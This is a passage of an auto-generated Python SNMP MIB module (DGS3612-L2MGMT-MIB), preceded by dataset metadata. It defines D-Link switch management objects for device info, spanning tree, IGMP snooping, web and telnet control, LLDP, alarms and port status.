end_time = time() - start_time
print(end_time)
| 45.608069
| 137
| 0.59377
|
794da01efa2c2ba990c6bfcd983c94b061f32df9
| 154,962
|
py
|
Python
|
pysnmp-with-texts/DGS3612-L2MGMT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/DGS3612-L2MGMT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/DGS3612-L2MGMT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module DGS3612-L2MGMT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/DGS3612-L2MGMT-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:46:32 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint")
AgentNotifyLevel, = mibBuilder.importSymbols("DLINK-ID-REC-MIB", "AgentNotifyLevel")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Counter64, TimeTicks, iso, IpAddress, Unsigned32, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, Gauge32, Counter32, ModuleIdentity, Integer32, NotificationType, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "TimeTicks", "iso", "IpAddress", "Unsigned32", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "Gauge32", "Counter32", "ModuleIdentity", "Integer32", "NotificationType", "ObjectIdentity")
TextualConvention, RowStatus, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "RowStatus", "DisplayString")
dgs3612, = mibBuilder.importSymbols("SW36XXPRIMGMT-MIB", "dgs3612")
swL2MgmtMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2))
if mibBuilder.loadTexts: swL2MgmtMIB.setLastUpdated('0007150000Z')
if mibBuilder.loadTexts: swL2MgmtMIB.setOrganization(' ')
if mibBuilder.loadTexts: swL2MgmtMIB.setContactInfo(' ')
if mibBuilder.loadTexts: swL2MgmtMIB.setDescription('The Structure of Layer 2 Network Management Information.')
class MacAddress(OctetString):
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(6, 6)
fixedLength = 6
class VlanId(Integer32):
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 4094)
class PortList(OctetString):
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(0, 127)
swL2DevMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1))
swL2MultiFilter = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 2))
swL2PortMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3))
swL2QOSMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6))
swL2PortSecurityMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7))
swL2TrunkMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9))
swL2MirrorMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10))
swL2IGMPMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11))
swL2TrafficSegMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 14))
swL2IpLimitedMulticastMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15))
swL2MgmtMIBTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16))
swL2VlanMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17))
swL2dot1vProtocolMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18))
swL2MulticastRangeMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19))
swL2LoopDetectMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20))
swL2DhcpLocalRelayMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24))
class IANAifMauAutoNegCapBits(TextualConvention, Bits):
reference = '[IEEE802.3], Section 30.6.1.1.5'
description = 'This data type is used as the syntax of the swL2PortAutoNegCapabilityBits, swL2PortAutoNegCapAdvertisedBits, and swL2PortAutoNegCapReceivedBits objects in swL2PortAutoNegTable.'
status = 'current'
namedValues = NamedValues(("bOther", 0), ("b10baseT", 1), ("b10baseTFD", 2), ("b100baseT4", 3), ("b100baseTX", 4), ("b100baseTXFD", 5), ("b100baseT2", 6), ("b100baseT2FD", 7), ("bFdxPause", 8), ("bFdxAPause", 9), ("bFdxSPause", 10), ("bFdxBPause", 11), ("b1000baseX", 12), ("b1000baseXFD", 13), ("b1000baseT", 14), ("b1000baseTFD", 15))
swL2DevInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1))
swDevInfoTotalNumOfPort = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevInfoTotalNumOfPort.setStatus('current')
if mibBuilder.loadTexts: swDevInfoTotalNumOfPort.setDescription('The number of ports within this switch. This value is the sum of the ports within this switch.')
swDevInfoNumOfPortInUse = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevInfoNumOfPortInUse.setStatus('current')
if mibBuilder.loadTexts: swDevInfoNumOfPortInUse.setDescription('The number of ports in this switch connected to the segment or the end stations.')
swDevModuleInfoTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3), )
if mibBuilder.loadTexts: swDevModuleInfoTable.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoTable.setDescription('This table contains the module information.')
swDevModuleInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swDevModuleInfoUnitID"), (0, "DGS3612-L2MGMT-MIB", "swDevModuleInfoModuleID"))
if mibBuilder.loadTexts: swDevModuleInfoEntry.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoEntry.setDescription('A list of management information for each unit in the system.')
swDevModuleInfoUnitID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 12))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoUnitID.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoUnitID.setDescription('This object indicates the specific unit ID in the stacking/chassis table.')
swDevModuleInfoModuleID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 8))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoModuleID.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoModuleID.setDescription('This object indicates the module ID of this unit.')
swDevModuleInfoModuleName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 12))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoModuleName.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoModuleName.setDescription('A textual string containing name of the the module. ')
swDevModuleInfoReversion = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 4))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoReversion.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoReversion.setDescription('A textual string containing reversion of the module.')
swDevModuleInfoSerial = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 9))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoSerial.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoSerial.setDescription('A textual string containing serial of the module.')
swDevModuleInfoDescription = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoDescription.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoDescription.setDescription('A textual string containing description of the module. ')
swDevInfoBootPromVersion = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevInfoBootPromVersion.setStatus('current')
if mibBuilder.loadTexts: swDevInfoBootPromVersion.setDescription('Boot Prom Version.')
swDevInfoFirmwareVersion = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevInfoFirmwareVersion.setStatus('current')
if mibBuilder.loadTexts: swDevInfoFirmwareVersion.setDescription('Boot firmware Version.')
swDevInfoFrontPanelLedStatus = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 6), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevInfoFrontPanelLedStatus.setStatus('current')
if mibBuilder.loadTexts: swDevInfoFrontPanelLedStatus.setDescription('This object is a set of system LED indications. The first two octets is defined as system LED. The first LED is power LED. The second LED is console LED. The third LED is RPS (Redundancy Power Supply) LED. The other octets following the second octets are the logical port LED (following dot1dBasePort ordering). Every two bytes are presented to a port. The first byte is presentd to the Link/Activity LED. The second byte is presented to the Speed LED. Link/Activity LED : The most significant bit is used for blink/solid: 8 = The LED blinks. The second significant bit is used for link status: 1 = link fail. 2 = link pass. Speed LED : 01 = 10Mbps. 02 = 100Mbps. 03 = 1000Mbps. 04 = 10Gbps. The four remaining bits are currently unused and must be 0.')
swL2DevCtrl = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2))
swL2DevCtrlStpState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlStpState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlStpState.setDescription('This object can be enabled or disabled spanning tree algorithm during runtime of the system.')
swL2DevCtrlIGMPSnooping = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlIGMPSnooping.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlIGMPSnooping.setDescription('This object indicates layer 2 Internet Group Management Protocol (IGMP) capture function is enabled or disabled.')
swL2DevCtrlIGMPSnoopingMcstRTOnly = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlIGMPSnoopingMcstRTOnly.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlIGMPSnoopingMcstRTOnly.setDescription('')
swL2DevCtrlRmonState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlRmonState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlRmonState.setDescription('This object can be enabled or disabled RMON.')
swL2DevCtrlCleanAllStatisticCounter = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("normal", 1), ("active", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlCleanAllStatisticCounter.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlCleanAllStatisticCounter.setDescription('As the object is set to active, all the statistic counters will be cleared. If set to normal, do nothing.')
swL2DevCtrlVlanIdOfFDBTbl = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 6), VlanId()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlVlanIdOfFDBTbl.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlVlanIdOfFDBTbl.setDescription('Indicates the VLAN ID which the Dot1dTpFdbTable belongs to ; The default value is DEFAULT_VLAN_ID of system .')
swL2DevCtrlManagementVlanId = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 7), VlanId()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlManagementVlanId.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlManagementVlanId.setDescription('This object controls which Vlan includes system ip. And the Vlan should have been created.')
swL2MACNotifyState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MACNotifyState.setStatus('current')
if mibBuilder.loadTexts: swL2MACNotifyState.setDescription('This object can enabled or disabled MAC Notification.')
swL2MACNotifyHistorySize = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 500))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MACNotifyHistorySize.setStatus('current')
if mibBuilder.loadTexts: swL2MACNotifyHistorySize.setDescription('This object indicates the history size of variation MAC in address table. The default value is 1 .')
swL2MACNotifyInterval = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MACNotifyInterval.setStatus('current')
if mibBuilder.loadTexts: swL2MACNotifyInterval.setDescription('This object indicates the time interval in second for trigger the MAC notify message. ')
swL2DevCtrlWeb = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 13))
swL2DevCtrlWebState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 13, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlWebState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlWebState.setDescription('This object control web status.')
swL2DevCtrlWebTcpPort = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 13, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlWebTcpPort.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlWebTcpPort.setDescription("This object can designate tcp port. When web disable this object can't accessible.")
swL2DevCtrlTelnet = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 14))
swL2DevCtrlTelnetState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 14, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlTelnetState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlTelnetState.setDescription('This object control telnet status.')
swL2DevCtrlTelnetTcpPort = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 14, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlTelnetTcpPort.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlTelnetTcpPort.setDescription("This object can designate tcp port. When telnet disable this object can't accessible.")
swL2DevCtrlIpAutoconfig = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 15), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlIpAutoconfig.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlIpAutoconfig.setDescription('')
swL2DevCtrlLedPOEState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 16), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlLedPOEState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlLedPOEState.setDescription('When set enabled(1), the POE LED is lighten. When set disabled(2), the Link/ACT/Speed LED is lighten.')
swL2DevCtrlClipagingState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlClipagingState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlClipagingState.setDescription('')
swL2DevCtrlLLDPState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlLLDPState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlLLDPState.setDescription('Specifies the state of the LLDP function. When this function is enabled, the switch can start to transmit LLDP packets and receive and process the LLDP packets. The specific function of each port will depend on the per port LLDP setting. For the advertisement of LLDP packets, the switch announces the information to its neighbor through ports. For receiving LLDP packets, the switch will learn the information from the LLDP packets advertised from the neighbor in the neighbor table. ')
swL2DevCtrlLLDPForwardMessageState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 19), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlLLDPForwardMessageState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlLLDPForwardMessageState.setDescription("When lldp is disabled and lldp forward_message's are enabled, the LLDP Data Unit packets received by the switch will be forwarded. ")
swL2DevCtrlVLANTrunkState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 22), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlVLANTrunkState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlVLANTrunkState.setDescription('This indicates the global state of the VLAN trunking feature of the device.')
swL2DevAlarm = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 3))
swL2DevAlarmNewRoot = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 3, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3))).clone(namedValues=NamedValues(("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevAlarmNewRoot.setStatus('current')
if mibBuilder.loadTexts: swL2DevAlarmNewRoot.setDescription('When the device has become the new root of the Spanning Tree, this object decide whether to send a new root trap.')
swL2DevAlarmTopologyChange = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 3, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3))).clone(namedValues=NamedValues(("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevAlarmTopologyChange.setStatus('current')
if mibBuilder.loadTexts: swL2DevAlarmTopologyChange.setDescription("This object determine to send a trap or not when the switch topology was changed. If the object is enabled(3), the topologyChange trap is sent by the device when any of its configured ports transitions from the Learning state to the Forwarding state, or from the Forwarding state to the Blocking state. For the same port tranition, the device doesn't send the trap if this object value is disabled or other.")
swL2DevAlarmLinkChange = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 3, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3))).clone(namedValues=NamedValues(("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevAlarmLinkChange.setStatus('current')
if mibBuilder.loadTexts: swL2DevAlarmLinkChange.setDescription("This object determine to send a trap or not when the link was changed. If the object is enabled(3), the Link Change trap is sent by the device when any of its ports link change. The device doesn't send the trap if this object value is disabled or other.")
swL2MultiFilterTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 2, 1), )
if mibBuilder.loadTexts: swL2MultiFilterTable.setStatus('current')
if mibBuilder.loadTexts: swL2MultiFilterTable.setDescription(' A table that contains infomation about vlan multicast filter mode.')
swL2MultiFilterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 2, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2MultiFilterVid"))
if mibBuilder.loadTexts: swL2MultiFilterEntry.setStatus('current')
if mibBuilder.loadTexts: swL2MultiFilterEntry.setDescription('A list of multicast filter mode information for each vlan. ')
swL2MultiFilterVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2MultiFilterVid.setStatus('current')
if mibBuilder.loadTexts: swL2MultiFilterVid.setDescription(' vid for each vlan')
swL2MultiFilterMode = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("forward-all-groups", 1), ("forward-unregistered-groups", 2), ("filter-unregistered-groups", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MultiFilterMode.setStatus('current')
if mibBuilder.loadTexts: swL2MultiFilterMode.setDescription(' vlan multicast filter mode.')
swL2PortInfoTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1), )
if mibBuilder.loadTexts: swL2PortInfoTable.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoTable.setDescription('A table that contains information about every port.')
swL2PortInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2PortInfoPortIndex"), (0, "DGS3612-L2MGMT-MIB", "swL2PortInfoMediumType"))
if mibBuilder.loadTexts: swL2PortInfoEntry.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoEntry.setDescription('A list of information for each port of the device.')
swL2PortInfoPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoPortIndex.setDescription("This object indicates the module's port number.(1..Max port number in the module)")
swL2PortInfoMediumType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("copper", 1), ("fiber", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoMediumType.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoMediumType.setDescription('Indicates medium type of the port number.')
swL2PortInfoUnitID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoUnitID.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoUnitID.setDescription('Indicates ID of the unit in the system')
swL2PortInfoType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("portType-none", 0), ("portType-100Base-T", 2), ("portType-100Base-X", 3), ("portType-1000Base-T", 4), ("portType-1000Base-X", 5), ("portType-10GBase-R", 6), ("portType-10GBase-CX4", 7), ("portType-SIO", 8), ("portType-module-empty", 9), ("portType-user-last", 10)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoType.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoType.setDescription('This object indicates the connector type of this port.')
swL2PortInfoLinkStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("link-pass", 2), ("link-fail", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoLinkStatus.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoLinkStatus.setDescription('This object indicates the port link status.')
swL2PortInfoNwayStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18))).clone(namedValues=NamedValues(("link-down", 0), ("full-10Mbps-8023x", 1), ("full-10Mbps-none", 2), ("half-10Mbps-backp", 3), ("half-10Mbps-none", 4), ("full-100Mbps-8023x", 5), ("full-100Mbps-none", 6), ("half-100Mbps-backp", 7), ("half-100Mbps-none", 8), ("full-1Gigabps-8023x", 9), ("full-1Gigabps-none", 10), ("half-1Gigabps-backp", 11), ("half-1Gigabps-none", 12), ("full-10Gigabps-8023x", 13), ("full-10Gigabps-none", 14), ("half-10Gigabps-8023x", 15), ("half-10Gigabps-none", 16), ("empty", 17), ("err-disabled", 18)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoNwayStatus.setStatus('current')
